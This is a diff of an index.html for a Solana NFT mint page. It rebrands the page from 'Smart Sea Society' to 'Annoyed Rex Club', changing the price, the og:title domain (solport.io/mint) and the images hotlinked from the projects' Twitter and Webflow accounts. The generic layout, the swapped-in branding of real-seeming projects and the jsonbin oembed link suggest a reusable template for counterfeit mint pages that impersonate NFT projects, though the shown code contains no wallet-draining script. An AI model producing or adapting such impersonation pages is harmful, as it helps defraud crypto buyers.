--- a/index.html
+++ b/index.html
@@ -4,18 +4,18 @@
     <meta charset="utf-8">
     <meta name="description" content="NTC" data-react-helmet="true" />
     <meta name="theme-color" content="#000000" />
-    <meta content="🌐 smartseasociety.com/mint" property="og:title">
+    <meta content="🌐 solport.io/mint" property="og:title">
     <meta content="
-     🟢 Smart Sea Society Minting is NOW LIVE!
+     🟢 Annoyed Rex Club Minting is NOW LIVE!
     
-     Mint Price: 1.7 SOL
+     Mint Price: 1.5 SOL
     " property="og:description">
-    <meta content="https://pbs.twimg.com/profile_banners/1516477249440133125/1653659738/1500x500" property="og:image">
+    <meta content="https://pbs.twimg.com/profile_banners/1483929989678604291/1652207065/1500x500" property="og:image">
     <meta name="twitter:card" content="summary_large_image">
-    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/127" />
+    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/130" />
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-    <title>Smart Sea Society</title>
-    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1516478643215732738/xftRIs6o_400x400.jpg" />
+    <title>Annoyed Rex Club</title>
+    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1527306328846356480/3zBgDba7_400x400.jpg" />
     <link rel="stylesheet" type="text/css" href="css/all.min.css">
     <link rel="stylesheet" type="text/css" href="css/normalize.css">
     <link rel="stylesheet" type="text/css" href="css/style.css">
@@ -66,12 +66,12 @@
         <div class="main-area">
 
             <div class="main-area__right">
-                <h2 class="right-title">Smart Sea Society</h2>
+                <h2 class="right-title">Annoyed Rex Club</h2>
 
                 <div class="right-list">
                     <li>
                         <div class="text">
-                            Building the world’s first AI Driven Web3 Platform using 1M+ datapoints ⚡️
+                            3210 Rexes waiting for the Impact Day | Be part of our “The Club’s Lore” and earn $IMPACT
                     </li>
                     </div>
 
@@ -82,7 +82,7 @@
                             <a href="javascript:void(0)" class="plus-btn">+</a>
                         </div>
                         <div class="price-box">
-                            <div id="price-total"><span>1.7</span> SOL</div>
+                            <div id="price-total"><span>1.5</span> SOL</div>
                             <div>2 NFT max per transaction</div>
                         </div>
                     </div>
@@ -103,7 +103,7 @@
                 </style>
                 <div class="main-area__left">
                     <div class="slider-area">
-                        <img class="animation" src="https://uploads-ssl.webflow.com/6269276a124ddf0519c152bf/6272554c3c4af31290dc86b9_Schermafbeelding%202022-05-04%20om%2012.08.37.png" alt="GiF">
+                        <img class="animation" src="https://uploads-ssl.webflow.com/621242debd8032bdec14a2e6/628cdb60b5f08a0c5170dd78_0829B286-4BB3-47B4-9BB6-95E3B307A6F6.gif" alt="GiF">
                     </div>
                 </div>
             </div>
@@ -119,7 +119,7 @@
         const $numberText = document.querySelector("#total");
         const $remaining = document.querySelector('#remaining');
         const $priceResultText = document.querySelector("#price-total span");
-        let itemPriceSelected = 1.7;
+        let itemPriceSelected = 1.5;
         let itemCount = 1;
 
         $plusButton.addEventListener("click", function(e) {
